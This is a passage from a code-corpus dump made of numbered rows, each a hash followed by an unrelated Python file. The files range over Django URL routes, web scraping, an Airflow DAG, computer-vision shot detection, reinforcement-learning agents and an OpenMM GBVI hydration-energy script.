# ่พ
ๅฉ้ๅ
from collections import deque
queue = deque()
"""
ไป (0,0) ๅผๅง๏ผๅฏนๆฏไธชๆ ผๅญๅฐ่ฏไธๆฌก BFS ๆไฝ
"""
for i in range(m):
for j in range(n):
# ๅช่ฆๆฏ้ๅฐ๏ผไธๆฒกๆ่ขซ่ฎฟ้ฎ่ฟ็๏ผๅฐฑๅฏไปฅไฝฟ็จ BFS ๅ็ฐไธไน็ธ่ฟ็้ๅฐ๏ผๅนถ่ฟ่กๆ ่ฎฐ
if grid[i][j] == '1' and not matrix_visited[i][j]:
# ------------------------------
# ๅฒๅฑฟ่ฎกๆฐ +1 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
island_count += 1
# print 'island_count: ', island_count
matrix_visited[i][j] = True
# print '(%s,%s)' % (i, j)
queue.append((i, j))
# ------------------------------
while queue:
x, y = queue.popleft()
# ไพๆฌกๆฃๆฅ 4 ไธชๆนๅ็้ปๅฑ
for direction in self.directions:
new_i = x + direction[0]
new_j = y + direction[1]
"""
ๆ ่ฎฐ่ฏฅๆ ผๅญๅทฒ่ขซ่ฎฟ้ฎ๏ผๅนถไธๅ
ฅ้ๅ็ๆกไปถ:
1.ๆจชๅๆ ๅจ็ฝๆ ผๅ
2.็บตๅๆ ๅจ็ฝๆ ผๅ
3.่ฏฅๆ ผๅญๆฒกๆ่ขซ้ๅ่ฟ
4.่ฏฅๆ ผๅญๆฏ้ๅฐ
"""
if 0 <= new_i <= m - 1 \
and 0 <= new_j <= n - 1 \
and not matrix_visited[new_i][new_j] \
and grid[new_i][new_j] == '1':
# ๆ ่ฎฐๅทฒ่ฎฟ้ฎ
matrix_visited[new_i][new_j] = True
# print '(%s,%s)' % (new_i, new_j)
# ๅ ๅ
ฅ้ๅ
queue.append((new_i, new_j))
pass
pass
# ------------------------------
pass
pass
pass
return island_count
# ================================================================================
# ================================================================================
# ================================================================================
# ================================================================================
gggg = [['1', '1', '1', '1', '0'],
['1', '1', '0', '1', '0'],
['1', '1', '0', '0', '0'],
['0', '0', '0', '0', '0']]
solution = Solution()
result = solution.numIslands(gggg)
print(result)
|
7,148 | f1e335d0187aeb78d857bc523eb33221fd2e7e6d |
def most_expensive_item(products):
return max(products.items(), key=lambda p: p[1])[0]
|
7,149 | e2671911894871c32ad933fde8e05c913a4cc942 | from django.urls import path
from . import views
from .views import propertyForRent, propertyForSale, PropertyDetailView
app_name = "core"
urlpatterns = [
path("", views.index, name="home"),
path("property_for_rent/", views.propertyForRent, name="property_rent"),
path("property_for_sale/", views.propertyForSale, name="property_sale"),
path("property/<int:pk>", PropertyDetailView.as_view(), name="property_detail"),
path("contact/", views.contact, name="contact"),
]
|
7,150 | 09ea684cfb6f0a521d3bdadf977d9385636bdc83 | from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('', views.PostList.as_view(), name='blog_index'),
path('<slug:slug>/', views.post_detail, name='post_detail'),
path('tag/<slug:slug>/', views.TagIndexView.as_view(), name='tag')
]
|
7,151 | 81f75498afcca31e38ea7856c81c291af3ef6673 | import urllib2
import csv
from bs4 import BeautifulSoup
url = {
"Home ": 'https://www.moneycontrol.com/',
# "Market": 'https://www.moneycontrol.com/stocksmarketsindia/',
# "Mf Home": 'https://www.moneycontrol.com/mutualfundindia/'
}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html,"lxml")
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return (csv_reader[-1])
for page,url_value in url.items():
print (page,get_last_element_timestamp(url_value))
# print page
##
bse_info_csv="http://www.moneycontrol.com/tech_charts/bse/his/it.csv"
nse_info_csv = "http://www.moneycontrol.com/tech_charts/nse/his/it.csv"
historic_sensex = "http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv"
historic_nifty = "http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv"
print("Historic csv infosys => BSE")
print(historic_data(bse_info_csv))
print ("Historic csv of infosys => NSE")
print(historic_data(nse_info_csv))
print ("Historic csv of sensex ")
print(historic_data(historic_sensex))
print ("Historic csv of nifty")
print (historic_data(historic_nifty))
|
7,152 | 3c2873add66172a5ed038949c31d514dcd5f26b3 | # -*-coding:utf-8 -*
# Copyright (c) 2011-2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import subprocess
import unittest
import time
class RemoteCli(object):
def sendCmd(self, cmd, *args):
shell_cmd = " ".join([self.platform_command, cmd])
if args is not None:
shell_cmd += " " + " ".join(args)
print "CMD :",
print "[" + shell_cmd + "]"
try:
p = subprocess.Popen(shell_cmd, shell=True, stdout=subprocess.PIPE)
except Exception as (errno, strerror):
return None, strerror
out, err = p.communicate()
if out is not None:
out = out.strip()
return out, err
class Pfw(RemoteCli):
def __init__(self):
self.platform_command = "remote-process localhost 5000 "
class Hal(RemoteCli):
def __init__(self):
self.platform_command = "remote-process localhost 5001 "
# Starts the HAL exe
def startHal(self):
cmd= "test-platform $PFW_TEST_CONFIGURATION"
subprocess.Popen(cmd, shell=True)
pass
# Send command "stop" to the HAL
def stopHal(self):
subprocess.call("remote-process localhost 5001 exit", shell=True)
def createInclusiveCriterion(self, name, nb):
self.sendCmd("createInclusiveSelectionCriterion", name, nb)
def createExclusiveCriterion(self, name, nb):
self.sendCmd("createExclusiveSelectionCriterion", name, nb)
# Starts the Pfw
def start(self):
self.sendCmd("start")
# A PfwTestCase gather tests performed on one instance of the PFW.
class PfwTestCase(unittest.TestCase):
hal = Hal()
def __init__(self, argv):
super(PfwTestCase, self).__init__(argv)
self.pfw = Pfw()
@classmethod
def setUpClass(cls):
cls.startHal()
@classmethod
def tearDownClass(cls):
cls.stopHal()
@classmethod
def startHal(cls):
# set up the Hal & pfw
cls.hal.startHal()
time.sleep(0.1)
# create criterions
cls.hal.createInclusiveCriterion("Crit_0", "2")
cls.hal.createExclusiveCriterion("Crit_1", "2")
# start the Pfw
cls.hal.start()
@classmethod
def stopHal(cls):
cls.hal.stopHal()
time.sleep(0.1)
|
7,153 | 62857a015087500fec534ba1297d42a33ae61927 | import testr
import testg
import time
def run():
parser = testg.OptionParser(description='Autonomous grasp and manipulation planning example.')
parser.add_option('--scene',
action="store",type='string',dest='scene',default='/home/user/experiment/data/lab1.env.xml',
help='Scene file to load (default=%default)')
parser.add_option('--nodestinations', action='store_true',dest='nodestinations',default=False,
help='If set, will plan without destinations.')
parser.add_option('--norandomize', action='store_false',dest='randomize',default=True,
help='If set, will not randomize the bodies and robot position in the scene.')
(options, args) = parser.parse_args()
env = testg.Environment()
try:
env.SetViewer('qtcoin')
env.Load(options.scene)
robot = env.GetRobots()[0]
env.UpdatePublishedBodies()
time.sleep(0.1) # give time for environment to update
SNP = testr.SimpleNavigationPlanning(robot)
SNP.performNavigationPlanning()
GP= testg.GraspPlanning(robot,randomize=options.randomize,nodestinations=options.nodestinations)
GP.performGraspPlanning()
SNP = testr.SimpleNavigationPlanning(robot)
SNP.performNavigationPlanning()
finally:
env.Destroy()
if __name__ == "__main__":
run()
|
7,154 | 6b731e329eec3947a17ef8ee8280f2ddf980c81c | print("Praktikum Programa Komputer ")
print("Exercise 7.21")
print("")
print("===========================")
print("Nama : Ivanindra Rizky P")
print("NIM : I0320054")
print("")
print("===========================")
print("")
import random
a = [23, 45, 98, 36]
print('a = ', a)
print('random 1')
print('choice = ', random.choice(a))
print('random 2')
print('choice = ', random.choice(a))
print('random 3')
print('choice = ', random.choice(a)) |
7,155 | 49492ad1a1734be02ebefb77095fd560a7a7efd8 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import airflow
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators import BashOperator, DummyOperator
from datetime import datetime, timedelta
# --------------------------------------------------------------------------------
# set default arguments
# --------------------------------------------------------------------------------
default_args = {
'owner': 'Jaimin',
'depends_on_past': False,
'start_date': datetime.now(),
'email': ['airflow@airflow.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
dag = DAG(
'hive_create_part_v1',
default_args=default_args,
schedule_interval="0 1 * * *",
concurrency=1)
# --------------------------------------------------------------------------------
# set tasks
# --------------------------------------------------------------------------------
task = BashOperator(
task_id='hive_create_parition',
bash_command='bash /data/appdata/airflow/script/hive_create_job.sh mnode2 ',
dag=dag)
|
7,156 | c2d8e34ab0b449a971c920fc86f259f093f16cc5 | import sys, os
sys.path.append(os.pardir) # ่ฆชใใฃใฌใฏใใชใฎใใกใคใซใใคใณใใผใใใใใใฎ่จญๅฎ
import numpy as np
from dataset.mnist import load_mnist
from controller import Controller
# ใใผใฟใฎ่ชญใฟ่พผใฟ
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
# instance
controller = Controller()
# accuracy
trycount = 1000
accuracy_cnt = 0
result = np.zeros((10, 10))
for i in range(len(x_test)):
p = controller.accuracy(x_test[i])
a = np.argmax(t_test[i])
#print("p = " + str(p))
#print("a = " + str(a))
result[p][a] += 1
#print(t_test[i])
if p == a:
accuracy_cnt += 1
if (i == trycount):
break
print("Accuracy:" + str(float(accuracy_cnt) / trycount))
print(result)
|
7,157 | d3a22cad850e895950ce322aac393b31758a2237 | def SimpleSymbols(str):
if str[0].isalpha() and str[-1].isalpha():
return "false"
for i in range(0, len(str)):
if str[i].isalpha():
if str[i-1] == '+' and str[i+1] == '+':
return "true"
return "false"
# keep this function call here
# to see how to enter arguments in Python scroll down
print SimpleSymbols(raw_input())
|
7,158 | 634c826d30b22c6061531c514914e9ca62b21605 | for row in range(7):
for col in range(5):
if (col == 0) or (row % 3 == 0):
print("*", end=" ")
else:
print(" ", end=" ")
print()
|
7,159 | 41e642c4acb212470577ef43908a1dcf2e0f5730 | import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float("inf")
for cls in data:
total = sum([len(val) for val in data.values()])
print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
minimum = min([len(data[cls]), minimum])
# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")
# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
7,160 | e4b49faaad648c6e85274abb18f994083a74013d | import numpy as np
catogory = np.array([50,30,40,20])
data = np.array([
[20,50,10,15,20],
[30,40,20,65,35],
[75,30,42,70,45],
[40,25,35,22,55]])
print(catogory)
print(data)
print(catogory.dot(data))
print(data.T.dot(catogory))
|
7,161 | 45f9d5ac0fa7d9259c1d53b92c030559f3bfda89 | #-*- coding: utf8 -*-
#Programa: 04-palindromo
#Objetivo:Un Numero Palindromo es aquel numero que se lee igual, de izquierda a derecha y viceversa
#El palindromo mas grande que se pued obtener por el producto de dos numeos de dos digitos
# es: 9009 que es igual a 91x99.
#Encuentre el palindromo mas grande que se pueda encontrar por el producto de numeo de tres digitos.
#Recomendacion: tratar de hacerlo con el ejemplo siempre.
#Autor: Fernando Martinez
#Fecha: 28 enero de 2020
def obtener_palindromo(valor):
"""
Funcion que verifica si un numero es palindromo
"""
#Luego de convertirlo a str, los vamos a insertar en una lista para luego verificar
palindromo = list(str(valor))
#lo insertamos en una nueva lista
palindromo_final = palindromo
#Luego aplicaremos la verificacion para comprobar si es un palindromo
if palindromo [:: -1] == palindromo_final:
return True
#print('El numero es un palindromo')
def multiplicaciones(): #906609 tiene que darme
"""
Funcion se encargara de crear las multiplicaciones entre 999 y 100
mediante dos ciclos for.
"""
ultimo_palindromo = 0
total = 0
for primer_numero in range(100, 1000):
for segundo_numero in range(100, 1000):
#total se encarga de hacer la multiplicacion entre los numeros
total = primer_numero * segundo_numero
# llamamos a la funcion que verifica si la multiplicacion que envia es un palindromo
if obtener_palindromo(total):
#luego de verificar que la multiplicacion era palindromo pasamos a evaluarla hasta llegar al ultimo palindromo
#entre 100 y 1000
if ultimo_palindromo < total:
ultimo_palindromo = total
return ultimo_palindromo
#Llamamos a la funcion
if __name__ == "__main__":
print(multiplicaciones())
|
7,162 | badbfdbdeb8b4fd40b1c44bf7dcff6457a0c8795 | def get_value(li, row, column):
if row < 0 or column < 0:
return 0
try:
return li[row][column]
except IndexError:
return 0
n = int(input())
results = {}
for asdf in range(n):
table = []
title, rows, columns = input().split()
rows = int(rows)
columns = int(columns)
for r in range(rows):
table.append([int(x) for x in input().split()])
flattened = [j for sub in table for j in sub]
sort = sorted(range(len(flattened)), key=lambda k: flattened[k])
distance = [[0 for i in range(columns)] for j in range(rows)]
#print(sort)
maxdist = 0
for i in sort:
r = i//columns
c = i % columns
#print(r)
#print(c)
w = 1
x = 1
y = 1
z = 1
if get_value(table, r, c) == get_value(table, r-1, c):
w = 0
if get_value(table, r, c) == get_value(table, r+1, c):
x = 0
if get_value(table, r, c) == get_value(table, r, c-1):
y = 0
if get_value(table, r, c) == get_value(table, r, c+1):
z = 0
#print(distance)
distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),
max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1
if distance[r][c] > maxdist:
maxdist = distance[r][c]
results[title] = maxdist
for key in results:
print(key + ": " + str(results[key]))
|
7,163 | 2df2cccc22aba2104ab15820e13d304addf83f63 | """slack_utils.py: slack-specific utilities"""
from os import path
import pprint
HERE = path.abspath(path.dirname(__file__))
PP = pprint.PrettyPrinter(indent=2)
def parse_slack_message_object(message_obj):
"""parse user_name/channel_name out of slack controller
Notes:
`slackbot.message`.keys(): [type, channel, user, text, ts, source_team, team]
Args:
message_obj (:obj:`slackbot.message`): response object for slack
Returns:
dict: message data
"""
metadata = dict(message_obj._body)
try:
metadata['channel_name'] = message_obj._client.channels[metadata['channel']]['name']
except KeyError:
metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(
message_obj._client.users[metadata['user']]['name']
)
metadata['user_name'] = message_obj._client.users[metadata['user']]['name']
metadata['team_name'] = message_obj._client.login_data['team']['name']
return metadata
def parse_discord_context_object(context_obj):
"""parse user_name/channel_name out of discord controller
Args:
context_obj (:obj:`discord.context`): response object for discord
Returns:
dict: standardized message data
"""
metadata = dict() # TODO: all context_obj.message.{children}.name values
metadata['user_name'] = context_obj.message.author.name
metadata['team_name'] = context_obj.message.server.name
try:
metadata['channel_name'] = context_obj.message.channel.name
except Exception:
metadata['channel_name'] = 'DIRECT_MESSAGE:{}'.format(context_obj.message.author.name)
return metadata
|
7,164 | 845d04312abc0e64a7810b52bbee333d2bdf3dfb | from torch import Tensor
from torch.autograd import Variable
from torch.optim import Adam
from maac.utils.misc import hard_update, onehot_from_logits
from maac.utils.policies import DiscretePolicy
class AttentionAgent(object):
"""
General class for Attention agents (policy, target policy)
"""
def __init__(self,
num_in_pol,
num_out_pol,
hidden_dim=64,
lr=0.01,
onehot_dim=0):
"""
Inputs:
num_in_pol (int): number of dimensions for policy input
num_out_pol (int): number of dimensions for policy output
"""
self.policy = DiscretePolicy(num_in_pol,
num_out_pol,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
self.target_policy = DiscretePolicy(num_in_pol,
num_out_pol,
hidden_dim=hidden_dim,
onehot_dim=onehot_dim)
hard_update(self.target_policy, self.policy)
self.policy_optimizer = Adam(self.policy.parameters(), lr=lr)
def step(self, obs, explore=False):
"""
Take a step forward in environment for a minibatch of observations
Inputs:
obs (PyTorch Variable): Observations for this agent
explore (boolean): Whether or not to sample
Outputs:
action (PyTorch Variable): Actions for this agent
"""
return self.policy(obs, sample=explore)
def get_params(self):
return {
'policy': self.policy.state_dict(),
'target_policy': self.target_policy.state_dict(),
'policy_optimizer': self.policy_optimizer.state_dict()
}
def load_params(self, params):
self.policy.load_state_dict(params['policy'])
self.target_policy.load_state_dict(params['target_policy'])
self.policy_optimizer.load_state_dict(params['policy_optimizer'])
|
7,165 | 397d9b1030a1ec08d04d2101f65a83547495b861 | import numpy as np
import cv2
import os
from moviepy.editor import *
N = 1
# Initiate SIFT detector
sift = cv2.xfeatures2d.SIFT_create()
# count file number in folder frames
list = os.listdir('./frames')
number_files = len(list)
# array to store similarity of 2 consecutive frames
similarity = []
boundaries = []
keypoints = []
#threshold
T = 0.5
# open file to write result
# file = open("result.txt", "w")
index_params = dict(algorithm = 0, trees = 5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
# bf = cv2.BFMatcher()
# run loop
for i in range(0, number_files-N-1, N):
img1 = cv2.imread('./frames/frame%d.jpg' %i, 0)
img2 = cv2.imread('./frames/frame%d.jpg' %(i+N), 0)
# find the keypoints and descriptors with SIFT
kp1, des1 = sift.detectAndCompute(img1,None)
kp2, des2 = sift.detectAndCompute(img2,None)
if(len(keypoints) == 0):
keypoints.append(kp1)
keypoints.append(kp2)
else:
keypoints.append(kp2)
matches = flann.knnMatch(des1, des2, k=2)
print(i)
# Apply ratio test
if len(matches):
good = []
for m,n in matches:
if m.distance < 0.6*n.distance:
good.append(m)
avg = (len(kp1) + len(kp2)) / 2
if avg:
ratio = len(good) / float(avg)
else:
ratio = 0
else:
ratio = 0
similarity.append(ratio)
n = len(similarity)
for i in range(1, n-2):
if similarity[i] < similarity[i-1] and similarity[i] < similarity[i+1]:
t = i-1
r = i+1
while similarity[t] < similarity[t-1]: t = t-1
if r < n-2:
while similarity[r] < similarity[r+1]: r = r+1
if similarity[i] < similarity[t]*T or similarity[i] < similarity[r]*T:
# file.write(str(i) + "\n")
boundaries.append(i)
# file.close()
video = VideoFileClip("test.mp4")
for i in range (len(boundaries)-2):
clip_start = int(boundaries[i]) * N / float(25)
clip_end = int(boundaries[i+1]) * N / float(25)
clip = video.subclip(clip_start, clip_end)
clip.write_videofile("./output/shot_%s.mp4" %i) |
7,166 | 55252fc78c67e48c64e777e4c3a713c898312b81 | import pyenttec, math, time
global port
MAX = 60
panels = [408, 401, 404, 16]
def render():
port.render()
def setColor(panel, color):
if panels[panel]:
port.set_channel(panels[panel] - 1, color[0])
port.set_channel(panels[panel], color[1])
port.set_channel(panels[panel] + 1, color[2])
def run(func):
global port
port = pyenttec.select_port()
func()
|
7,167 | 0ac9e757fa827b311487169d0dc822951ce8c4bb | #!/usr/bin/env python
#=============================================================================================
# MODULE DOCSTRING
#=============================================================================================
"""
evaluate-gbvi.py
Evaluate the GBVI model on hydration free energies of small molecules for multiple iterations of the Markov chain.
"""
#=============================================================================================
# GLOBAL IMPORTS
#=============================================================================================
import sys,string
from openeye.oechem import *
from optparse import OptionParser # For parsing of command line arguments
import os
import math
import numpy
import simtk.openmm as openmm
import simtk.unit as units
import openeye.oechem
import openeye.oequacpac
import openeye.oeiupac
from openeye.oechem import *
from openeye.oequacpac import *
from openeye.oeszybki import *
from openeye.oeiupac import *
import time
import pymc
#=============================================================================================
# Load OpenMM plugins.
#=============================================================================================
print "Loading OpenMM plugins..."
openmm.Platform.loadPluginsFromDirectory(os.path.join(os.environ['OPENMM_INSTALL_DIR'], 'lib'))
openmm.Platform.loadPluginsFromDirectory(os.path.join(os.environ['OPENMM_INSTALL_DIR'], 'lib', 'plugins'))
#=============================================================================================
# Atom Typer
#=============================================================================================
class AtomTyper(object):
"""
Atom typer
Based on 'Patty', by Pat Walters.
"""
class TypingException(Exception):
"""
Atom typing exception.
"""
def __init__(self, molecule, atom):
self.molecule = molecule
self.atom = atom
def __str__(self):
return "Atom not assigned: %6d %8s" % (self.atom.GetIdx(), OEGetAtomicSymbol(self.atom.GetAtomicNum()))
def __init__(self, infileName, tagname):
self.pattyTag = OEGetTag(tagname)
self.smartsList = []
ifs = open(infileName)
lines = ifs.readlines()
for line in lines:
# Strip trailing comments
index = line.find('%')
if index != -1:
line = line[0:index]
# Split into tokens.
toks = string.split(line)
if len(toks) == 2:
smarts,type = toks
pat = OESubSearch()
pat.Init(smarts)
pat.SetMaxMatches(0)
self.smartsList.append([pat,type,smarts])
def dump(self):
for pat,type,smarts in self.smartsList:
print pat,type,smarts
def assignTypes(self,mol):
# Assign null types.
for atom in mol.GetAtoms():
atom.SetStringData(self.pattyTag, "")
# Assign atom types using rules.
OEAssignAromaticFlags(mol)
for pat,type,smarts in self.smartsList:
for matchbase in pat.Match(mol):
for matchpair in matchbase.GetAtoms():
matchpair.target.SetStringData(self.pattyTag,type)
# Check if any atoms remain unassigned.
for atom in mol.GetAtoms():
if atom.GetStringData(self.pattyTag)=="":
raise AtomTyper.TypingException(mol, atom)
def debugTypes(self,mol):
for atom in mol.GetAtoms():
print "%6d %8s %8s" % (atom.GetIdx(),OEGetAtomicSymbol(atom.GetAtomicNum()),atom.GetStringData(self.pattyTag))
def getTypeList(self,mol):
typeList = []
for atom in mol.GetAtoms():
typeList.append(atom.GetStringData(self.pattyTag))
return typeList
#=============================================================================================
# Utility routines
#=============================================================================================
def read_gbvi_parameters(filename):
"""
Read a GBVI parameter set from a file.
ARGUMENTS
filename (string) - the filename to read parameters from
RETURNS
parameters (dict) - parameters[(atomtype,parameter_name)] contains the dimensionless parameter
"""
parameters = dict()
infile = open(filename, 'r')
for line in infile:
# Strip trailing comments
index = line.find('%')
if index != -1:
line = line[0:index]
# Parse parameters
elements = line.split()
if len(elements) == 3:
[atomtype, radius, gamma] = elements
parameters['%s_%s' % (atomtype,'radius')] = float(radius)
parameters['%s_%s' % (atomtype,'gamma')] = float(gamma)
return parameters
#=============================================================================================
# Computation of hydration free energies
#=============================================================================================
def function(x):
(molecule, parameters) = x
return compute_hydration_energy(molecule, parameters)
def compute_hydration_energies_parallel(molecules, parameters):
import multiprocessing
# Create processor pool.
nprocs = 8
pool = multiprocessing.Pool(processes=nprocs)
x = list()
for molecule in molecules:
x.append( (molecule, parameters) )
# Distribute calculation.
results = pool.map(function, x)
return results
def compute_hydration_energies(molecules, parameters):
"""
Compute solvation energies of all specified molecules using given parameter set.
ARGUMENTS
molecules (list of OEMol) - molecules with atom types
parameters (dict) - parameters for atom types
RETURNS
energies (dict) - energies[molecule] is the computed solvation energy of given molecule
"""
energies = dict() # energies[index] is the computed solvation energy of molecules[index]
platform = openmm.Platform.getPlatformByName("Reference")
for molecule in molecules:
# Create OpenMM System.
system = openmm.System()
for atom in molecule.GetAtoms():
mass = OEGetDefaultMass(atom.GetAtomicNum())
system.addParticle(mass * units.amu)
# Add nonbonded term.
# nonbonded_force = openmm.NonbondedSoftcoreForce()
# nonbonded_force.setNonbondedMethod(openmm.NonbondedForce.NoCutoff)
# for atom in molecule.GetAtoms():
# charge = 0.0 * units.elementary_charge
# sigma = 1.0 * units.angstrom
# epsilon = 0.0 * units.kilocalories_per_mole
# nonbonded_force.addParticle(charge, sigma, epsilon)
# system.addForce(nonbonded_force)
# Add GBVI term
# gbvi_force = openmm.GBVISoftcoreForce()
gbvi_force = openmm.GBVIForce()
gbvi_force.setNonbondedMethod(openmm.GBVIForce.NoCutoff) # set no cutoff
gbvi_force.setSoluteDielectric(1)
gbvi_force.setSolventDielectric(78)
# Use scaling method.
# gbvi_force.setBornRadiusScalingMethod(openmm.GBVISoftcoreForce.QuinticSpline)
# gbvi_force.setQuinticLowerLimitFactor(0.75)
# gbvi_force.setQuinticUpperBornRadiusLimit(50.0*units.nanometers)
# Build indexable list of atoms.
atoms = [atom for atom in molecule.GetAtoms()]
# Assign GB/VI parameters.
for atom in molecule.GetAtoms():
atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
charge = atom.GetPartialCharge() * units.elementary_charge
radius = parameters['%s_%s' % (atomtype, 'radius')] * units.angstroms
gamma = parameters['%s_%s' % (atomtype, 'gamma')] * units.kilocalories_per_mole
# gamma *= -1.0 # DEBUG
lambda_ = 1.0 # fully interacting
# gbvi_force.addParticle(charge, radius, gamma, lambda_) # for GBVISoftcoreForce
gbvi_force.addParticle(charge, radius, gamma) # for GBVIForce
# Add bonds.
for bond in molecule.GetBonds():
# Get atom indices.
iatom = bond.GetBgnIdx()
jatom = bond.GetEndIdx()
# Get bond length.
(xi, yi, zi) = molecule.GetCoords(atoms[iatom])
(xj, yj, zj) = molecule.GetCoords(atoms[jatom])
distance = math.sqrt((xi-xj)**2 + (yi-yj)**2 + (zi-zj)**2) * units.angstroms
# Identify bonded atoms to GBVI.
gbvi_force.addBond(iatom, jatom, distance)
# Add the force to the system.
system.addForce(gbvi_force)
# Build coordinate array.
natoms = len(atoms)
coordinates = units.Quantity(numpy.zeros([natoms, 3]), units.angstroms)
for (index,atom) in enumerate(atoms):
(x,y,z) = molecule.GetCoords(atom)
coordinates[index,:] = units.Quantity(numpy.array([x,y,z]),units.angstroms)
# Create OpenMM Context.
timestep = 1.0 * units.femtosecond # arbitrary
integrator = openmm.VerletIntegrator(timestep)
context = openmm.Context(system, integrator, platform)
# Set the coordinates.
context.setPositions(coordinates)
# Get the energy
state = context.getState(getEnergy=True)
energies[molecule] = state.getPotentialEnergy()
return energies
def compute_hydration_energy(molecule, parameters, platform_name="Reference"):
"""
Compute hydration energy of a specified molecule given the specified GBVI parameter set.
ARGUMENTS
molecule (OEMol) - molecule with GBVI atom types
parameters (dict) - parameters for GBVI atom types
RETURNS
energy (float) - hydration energy in kcal/mol
"""
platform = openmm.Platform.getPlatformByName(platform_name)
# Create OpenMM System.
system = openmm.System()
for atom in molecule.GetAtoms():
mass = OEGetDefaultMass(atom.GetAtomicNum())
system.addParticle(mass * units.amu)
# Add GBVI term
# gbvi_force = openmm.GBVISoftcoreForce()
gbvi_force = openmm.GBVIForce()
gbvi_force.setNonbondedMethod(openmm.GBVIForce.NoCutoff) # set no cutoff
gbvi_force.setSoluteDielectric(1)
gbvi_force.setSolventDielectric(78)
# Use scaling method.
# gbvi_force.setBornRadiusScalingMethod(openmm.GBVISoftcoreForce.QuinticSpline)
# gbvi_force.setQuinticLowerLimitFactor(0.75)
# gbvi_force.setQuinticUpperBornRadiusLimit(50.0*units.nanometers)
# Build indexable list of atoms.
atoms = [atom for atom in molecule.GetAtoms()]
# Assign GB/VI parameters.
for atom in molecule.GetAtoms():
atomtype = atom.GetStringData("gbvi_type") # GBVI atomtype
charge = atom.GetPartialCharge() * units.elementary_charge
try:
radius = parameters['%s_%s' % (atomtype, 'radius')] * units.angstroms
gamma = parameters['%s_%s' % (atomtype, 'gamma')] * units.kilocalories_per_mole
except Exception, exception:
print "Cannot find parameters for atomtype '%s' in molecule '%s'" % (atomtype, molecule.GetTitle())
print parameters.keys()
raise exception
# gamma *= -1.0 # DEBUG
lambda_ = 1.0 # fully interacting
# gbvi_force.addParticle(charge, radius, gamma, lambda_) # for GBVISoftcoreForce
gbvi_force.addParticle(charge, radius, gamma) # for GBVIForce
# Add bonds.
for bond in molecule.GetBonds():
# Get atom indices.
iatom = bond.GetBgnIdx()
jatom = bond.GetEndIdx()
# Get bond length.
(xi, yi, zi) = molecule.GetCoords(atoms[iatom])
(xj, yj, zj) = molecule.GetCoords(atoms[jatom])
distance = math.sqrt((xi-xj)**2 + (yi-yj)**2 + (zi-zj)**2) * units.angstroms
# Identify bonded atoms to GBVI.
gbvi_force.addBond(iatom, jatom, distance)
# Add the force to the system.
system.addForce(gbvi_force)
# Build coordinate array.
natoms = len(atoms)
coordinates = units.Quantity(numpy.zeros([natoms, 3]), units.angstroms)
for (index,atom) in enumerate(atoms):
(x,y,z) = molecule.GetCoords(atom)
coordinates[index,:] = units.Quantity(numpy.array([x,y,z]),units.angstroms)
# Create OpenMM Context.
timestep = 1.0 * units.femtosecond # arbitrary
integrator = openmm.VerletIntegrator(timestep)
context = openmm.Context(system, integrator, platform)
# Set the coordinates.
context.setPositions(coordinates)
# Get the energy
state = context.getState(getEnergy=True)
energy = state.getPotentialEnergy() / units.kilocalories_per_mole
if numpy.isnan(energy):
energy = +1e6;
return energy
def hydration_energy_factory(molecule):
def hydration_energy(**parameters):
return compute_hydration_energy(molecule, parameters, platform_name="Reference")
return hydration_energy
#=============================================================================================
# PyMC model
#=============================================================================================
